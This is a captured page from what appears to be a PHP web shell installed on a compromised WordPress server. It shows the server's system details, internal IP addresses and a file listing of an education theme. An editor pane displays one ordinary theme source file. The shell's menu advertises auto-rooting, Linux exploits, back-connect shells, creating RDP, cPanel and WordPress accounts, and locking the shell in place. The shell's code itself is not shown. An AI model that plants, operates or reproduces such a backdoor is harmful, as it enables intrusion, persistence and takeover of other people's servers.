Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
mooceu /
wp-content /
themes /
eduma /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-x--x
data
[ DIR ]
drwxr-x--x
header
[ DIR ]
drwxr-x--x
libs
[ DIR ]
drwxr-x--x
templates
[ DIR ]
drwxr-x--x
widgets
[ DIR ]
drwxr-x--x
custom-functions.php
76.83
KB
-rwxr-x--x
learnpress-functions.php
50.23
KB
-rwxr-x--x
learnpress-v3-functions.php
33.8
KB
-rwxr-x--x
learnpress-v4-functions.php
27.59
KB
-rwxr-x--x
lp-course_offline.php
20.35
KB
-rwxr-x--x
register-functions.php
18.83
KB
-rwxr-x--x
related.php
1.61
KB
-rwxr-x--x
tax-meta.php
3.41
KB
-rwxr-x--x
template-tags.php
13.76
KB
-rwxr-x--x
thim-core-function.php
10.39
KB
-rwxr-x--x
upgrade.php
17.23
KB
-rwxr-x--x
wrapper-before-after.php
6.99
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : thim-core-function.php
<?php require THIM_DIR . 'inc/admin/thim-core-installer/installer.php'; if ( class_exists( 'TP' ) ) { require THIM_DIR . 'inc/admin/plugins-require.php'; require THIM_DIR . 'inc/admin/customizer-options.php'; require_once( THIM_DIR . 'inc/widgets/login-popup/login-popup.php' ); } require_once THIM_DIR . 'inc/widgets/shortcodes.php'; require_once THIM_DIR . 'inc/widgets/class-el-extend.php'; require THIM_DIR . 'inc/libs/Tax-meta-class/Tax-meta-class.php'; require THIM_DIR . 'inc/tax-meta.php'; //Filter meta-box add_filter( 'thim_metabox_display_settings', 'thim_add_metabox_settings', 100, 2 ); if ( ! function_exists( 'thim_add_metabox_settings' ) ) { function thim_add_metabox_settings( $meta_box, $prefix ) { $meta_box['post_types'] = array( 'page', 'post', 'lp_course', 'our_team', 'testimonials', 'product', 'tp_event', 'portfolio' ); $prefix = 'thim_mtb_'; if ( isset( $_GET['post'] ) && ( $_GET['post'] == get_option( 'page_on_front' ) || $_GET['post'] == get_option( 'page_for_posts' ) ) ) { $meta_box['tabs'] = array( 'header' => array( 'label' => __( 'Custom Header', 'eduma' ), 'icon' => 'dashicons-editor-kitchensink', ), ); } else { $meta_box['tabs'] = array( 'title' => array( 'label' => __( 'Featured Title Area', 'eduma' ), 'icon' => 'dashicons-admin-appearance', ), 'layout' => array( 'label' => __( 'Layout', 'eduma' ), 'icon' => 'dashicons-align-left', ), 'header' => array( 'label' => __( 'Header Setting', 'eduma' ), 'icon' => 'dashicons-editor-kitchensink', ), ); } if ( get_post_type() == 'lp_course' ) { $meta_box['tabs']['course_setting'] = array( 'label' => __( 'Course Setting', 'eduma' ), 'icon' => 'dashicons-editor-kitchensink', ); } $meta_box['fields'] = array( /** * Custom Title and Subtitle. */ array( 'name' => __( 'Custom Title and Subtitle', 'thim-core' ), 'id' => $prefix . 'using_custom_heading', 'type' => 'checkbox', 'std' => false, 'tab' => 'title', ), array( 'name' => __( 'Hide Title and Subtitle', 'thim-core' ), 'id' => $prefix . 'hide_title_and_subtitle', 'type' => 'checkbox', 'std' => false, 'hidden' => array( $prefix . 'using_custom_heading', '!=', true ), 'tab' => 'title', ), array( 'name' => __( 'Custom Title', 'thim-core' ), 'id' => $prefix . 'custom_title', 'type' => 'text', 'desc' => __( 'Leave empty to use post title', 'thim-core' ), 'hidden' => array( $prefix . 'using_custom_heading', '!=', true ), 'tab' => 'title', ), array( 'name' => __( 'Color Title', 'thim-core' ), 'id' => $prefix . 'text_color', 'type' => 'color', 'hidden' => array( $prefix . 'using_custom_heading', '!=', true ), 'tab' => 'title', ), array( 'name' => __( 'Subtitle', 'thim-core' ), 'id' => 'thim_subtitle', 'type' => 'text', 'hidden' => array( $prefix . 'using_custom_heading', '!=', true ), 'tab' => 'title', ), array( 'name' => __( 'Color Subtitle', 'thim-core' ), 'id' => $prefix . 'color_sub_title', 'type' => 'color', 'hidden' => array( $prefix . 'using_custom_heading', '!=', true ), 'tab' => 'title', ), array( 'name' => __( 'Hide Breadcrumbs', 'thim-core' ), 'id' => $prefix . 'hide_breadcrumbs', 'type' => 'checkbox', 'std' => false, 'hidden' => array( $prefix . 'using_custom_heading', '!=', true ), 'tab' => 'title', ), array( 'name' => __( 'Background Image', 'thim-core' ), 'id' => $prefix . 'top_image', 'type' => 'image_advanced', 'max_file_uploads' => 1, 'tab' => 'title', 'hidden' => array( $prefix . 'using_custom_heading', '!=', true ), ), array( 'name' => __( 'Background color', 'thim-core' ), 'id' => $prefix . 'bg_color', 'type' => 'color', 'hidden' => array( $prefix . 'using_custom_heading', '!=', true ), 'tab' => 'title', 'alpha' => true, ), array( 'name' => __( 'Background color opacity', 'thim-core' ), 'id' => $prefix . 'bg_opacity', 'type' => 'number', 'desc' => __( 'input color opacity: Ex: 0.1 ', 'thim-core' ), 'std' => 1, 'step' => '0.1', 'min' => 0, 'max' => 1, 'hidden' => array( $prefix . 'using_custom_heading', '!=', true ), 'tab' => 'title', ), /** * Custom layout */ array( 'name' => __( 'Use Custom Layout', 'thim-core' ), 'id' => $prefix . 'custom_layout', 'type' => 'checkbox', 'tab' => 'layout', 'std' => false, ), array( 'name' => __( 'Select Layout', 'thim-core' ), 'id' => $prefix . 'layout', 'type' => 'image_select', 'options' => array( 'sidebar-left' => THIM_URI . 'images/layout/sidebar-left.jpg', 'full-content' => THIM_URI . 'images/layout/body-full.jpg', 'sidebar-right' => THIM_URI . 'images/layout/sidebar-right.jpg', 'full-width' => THIM_URI . 'images/layout/content-full.jpg', ), 'default' => 'sidebar-right', 'tab' => 'layout', 'hidden' => array( $prefix . 'custom_layout', '=', false ), ), array( 'name' => __( 'No Padding Content', 'thim-core' ), 'id' => $prefix . 'no_padding', 'type' => 'checkbox', 'std' => false, 'tab' => 'layout', ), /* * Header */ array( 'name' => __( 'Logo', 'eduma' ), 'id' => $prefix . 'logo', 'type' => 'image_advanced', 'max_file_uploads' => 1, 'tab' => 'header', ), array( 'name' => __( 'Position', 'eduma' ), 'id' => $prefix . 'header_position', 'type' => 'select', 'options' => array( '' => esc_html__( 'Use option Customizer', 'eduma' ), 'header_default' => esc_html__( 'Default', 'eduma' ), 'header_overlay' => esc_html__( 'Overlay', 'eduma' ), ), 'tab' => 'header', ), array( 'name' => __( 'Background color', 'eduma' ), 'id' => $prefix . 'bg_main_menu_color', 'type' => 'color', 'alpha' => true, 'tab' => 'header', ), array( 'name' => __( 'Text Color', 'eduma' ), 'id' => $prefix . 'main_menu_text_color', 'type' => 'color', 'tab' => 'header', ), array( 'name' => __( 'Text Color Hover', 'eduma' ), 'id' => $prefix . 'main_menu_text_hover_color', 'type' => 'color', 'tab' => 'header', ), array( 'name' => __( 'Select Layout', 'thim-core' ), 'id' => $prefix . 'layout_content_page', 'type' => 'image_select', 'options' => array( '' => THIM_URI . 'images/customizer/single-default.svg', 'normal' => THIM_URI . 'images/customizer/single-course-1.svg', 'new-1' => THIM_URI . 'images/customizer/single-course-2.svg', 'layout_style_2' => THIM_URI . 'images/customizer/single-course-3.svg', 'layout_style_3' => THIM_URI . 'images/customizer/single-course-4.svg', ), 'default' => '', 'tab' => 'course_setting', ), array( 'name' => __( 'Top infor Course BG Colors', 'eduma' ), 'id' => $prefix . 'bg_top_info_course', 'type' => 'color', 'tab' => 'course_setting', 'hidden' => array( $prefix . 'layout_content_page', '!=', 'layout_style_3' ), ), array( 'name' => __( 'Top infor Course Colors', 'eduma' ), 'id' => $prefix . 'text_top_info_course', 'type' => 'color', 'tab' => 'course_setting', 'hidden' => array( $prefix . 'layout_content_page', '!=', 'layout_style_3' ), ), ); return $meta_box; } } /** * List child themes. * * @return array */ function thim_eduma_list_child_themes() { return array( 'eduma-child' => array( 'name' => 'Eduma Child', 'slug' => 'eduma-child', 'screenshot' => 'https://plugins.thimpress.com/downloads/images/eduma-child.png', 'source' => 'https://github.com/ThimPressWP/demo-data/raw/master/eduma/child-themes/eduma-child/eduma-child.zip', 'version' => '1.0.0' ), ); } add_filter( 'thim_core_list_child_themes', 'thim_eduma_list_child_themes' ); /** * @param $settings * * @return array */ if ( ! function_exists( 'thim_import_add_basic_settings' ) ) { function thim_import_add_basic_settings( $settings ) { $settings[] = 'learn_press_archive_course_limit'; // $settings[] = 'siteorigin_panels_settings'; $settings[] = 'thim_enable_mega_menu'; //$settings[] = 'wpb_js_margin'; //$settings[] = 'users_can_register'; //$settings[] = 'permalink_structure'; //$settings[] = 'wpb_js_use_custom'; // Elementor global settings // $settings[] = 'elementor_container_width'; // $settings[] = 'elementor_space_between_widgets'; $settings[] = 'learn_press_course_thumbnail_dimensions'; $settings[] = 'thim_ekits_widget_settings'; $settings[] = 'elementor_css_print_method'; $settings[] = 'elementor_experiment-e_font_icon_svg'; return $settings; } } add_filter( 'thim_importer_basic_settings', 'thim_import_add_basic_settings' ); add_filter( 'thim_importer_thim_enable_mega_menu', '__return_true' ); /** * @param $settings * * @return array */ if ( ! function_exists( 'thim_import_add_page_id_settings' ) ) { function thim_import_add_page_id_settings( $settings ) { $settings[] = 'learn_press_courses_page_id'; $settings[] = 'learn_press_profile_page_id'; $settings[] = 'elementor_active_kit'; return $settings; } } add_filter( 'thim_importer_page_id_settings', 'thim_import_add_page_id_settings' ); //Add info for Dashboard Admin if ( ! function_exists( 'thim_eduma_links_guide_user' ) ) { function thim_eduma_links_guide_user() { return array( 'docs' => 'http://docspress.thimpress.com/eduma/', 'support' => 'https://thimpress.com/forums/forum/eduma/', 'knowledge' => 'https://thimpress.com/knowledge-base/', ); } } add_filter( 'thim_theme_links_guide_user', 'thim_eduma_links_guide_user' ); /** * Link purchase theme. */ if ( ! function_exists( 'thim_eduma_link_purchase' ) ) { function thim_eduma_link_purchase() { return 'https://1.envato.market/G5Ook'; } } add_filter( 'thim_envato_link_purchase', 'thim_eduma_link_purchase' ); /** * Envato id. */ if ( ! function_exists( 'thim_eduma_envato_item_id' ) ) { function thim_eduma_envato_item_id() { return '14058034'; } } add_filter( 'thim_envato_item_id', 'thim_eduma_envato_item_id' );
Close